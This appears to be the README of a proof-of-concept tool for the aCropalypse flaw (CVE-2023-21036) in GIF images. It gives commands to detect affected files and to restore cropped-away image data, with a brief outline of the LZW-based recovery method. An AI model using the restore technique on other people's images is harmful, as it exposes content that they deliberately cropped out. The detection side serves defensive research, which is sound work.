aCropalypse gif

aCropalypse（CVE-2023-21036）related GIF PoC. The aCropalypse reported affects PNG, but a similar exploit exists in GIF images.

PoC

This is original GIF Image case02.gif.

And crop image case02_crop.gif using aCropalypse affected software.

Execute acropalypse-gif restore

$ acropalypse-gif restore asset/case02_crop.gif 688 634
asset/case02_crop.gif-restored.gif

cargo build --release

Detect aCropalypse gif image.

acropalypse-gif detect <filepath>

# undetected
$ acropalypse-gif detect asset/case01.gif

# detected
$ acropalypse-gif detect asset/case01_crop.gif
asset/case01_crop.gif

Restore partical gif image from aCropalypse affected gif image.

acropalypse-gif restore <filepath> <width> <height>

# restore case01.gif
$ acropalypse-gif restore asset/case01_crop.gif 619 232
asset/case01_crop.gif-restored.gif

docker compose run --rm acropalypse-gif detect asset/case01_crop.gif
docker compose run --rm acropalypse-gif restore asset/case01_crop.gif 619 232

Search Image Data Sub-block. It may be start 0xFF and verify GIF Image Data format.
Search 12bit Clear Code of LZW compression(GIF). It may be 0b000100000000.
Decompress LZW after Clear Code.
Encode image using cropped image palette.

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
asset		asset
doc		doc
src		src
.gitignore		.gitignore
Cargo.toml		Cargo.toml
LICENSE-APACHE		LICENSE-APACHE
LICENSE-MIT		LICENSE-MIT
Makefile		Makefile
Makefile.toml		Makefile.toml
README.md		README.md
acropalypse-gif.dockerfile		acropalypse-gif.dockerfile
compose.yml		compose.yml
dev.dockerfile		dev.dockerfile